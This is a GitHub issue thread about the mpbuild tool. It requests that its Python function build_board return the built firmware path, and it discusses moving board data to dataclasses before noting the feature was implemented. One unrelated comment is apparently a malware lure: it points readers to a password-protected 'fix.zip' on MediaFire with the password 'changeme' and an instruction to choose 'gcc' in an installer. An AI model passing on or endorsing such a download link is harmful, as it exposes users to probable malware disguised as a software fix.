### ISSUE TITLE
Enhancement: Python interface in addition to command line interface: Return the firmware file

### ISSUE THREAD

**Issue by hmaerki** [mattytrentini/mpbuild#18]
`mpbuild` could be used in octoprobe.

The python interface just behind the command line interface is:

```
    # Find the port for the supplied board
    port = get_port(board)

    build_board(port, board, variant, extra_args or [], build_container, idf)
```

This is find as it is easy to use.

However it would be helpful when `build_board` would return the path to the firmware which just was built.

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Josverl** [comment]
I'd been considering a similar request for mpbuild to be called from mpflash

**Comment by hmaerki** [comment]
I now started using the code in `src/mpbuild/find_boards.py`.

The interface is not self-explanatory. There are python dicts and no code completion on these dicts.

So my proposal would be to just rewrite this file using dataclasses.

If you are interested, I could make a proposal in form of a PR.

**Comment by mattytrentini** [comment]
It makes sense for mpbuild to be a callable module as well as cli tool; that was my intention though I've mostly been trying to get the cli side done. 

@hmaerki please feel free to raise a PR but this is very early days in mpbuild's life, I've shown it as early as I could, I still intend to overhaul it quite a lot. Updating `board_db` is on my radar - but I would definitely like to keep it lightweight and simple. I'm not unhappy with the data structure, but it could use a light touch to improve usability - a dataclass is a good idea. You may want to wait a few days though as I have some changes to integrate that will make rebasing a little difficult...

**Comment by hmaerki** [comment]
This feature has been implemented in https://github.com/mattytrentini/mpbuild/pull/54
